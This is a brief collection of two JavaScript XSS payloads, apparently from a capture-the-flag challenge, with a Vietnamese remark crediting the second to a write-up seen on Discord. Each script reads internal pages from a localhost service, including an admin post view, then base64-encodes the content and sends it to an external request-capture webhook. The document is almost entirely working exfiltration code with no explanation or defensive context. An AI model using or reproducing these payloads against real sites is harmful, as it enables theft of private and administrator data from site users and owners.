<script>

async function fetchPostViews() {
    const url = `http://localhost:1337/posts`;
      const response = await fetch(url);
      const text = await response.text();
      const encodedText = btoa(text);
      const webhookURL = 'https://requestinspector.com/inspect/01h6khadd4zy7et2yqdmsdcw48'; 
      const webhookParams = `?data=${encodeURIComponent(encodedText)}`;
      await fetch(webhookURL + webhookParams); 
  }
  fetchPostViews();

</script>


###################################
 wu của ông nào đó trên dis 
<script>
const httpInfo = `
  Protocol: ${window.location.protocol}
  Hostname: ${window.location.hostname}
`;

fetch('http://localhost:1337/posts/view/admin', {mode: 'no-cors'})
  .then(r => r.text())
  .then(text => {
    const data = httpInfo + text;
    const encodedData = btoa(data);
    fetch(`https://anaihn7u.requestrepo.com?cc=${encodedData}`, {mode: 'no-cors'});
  });
</script>
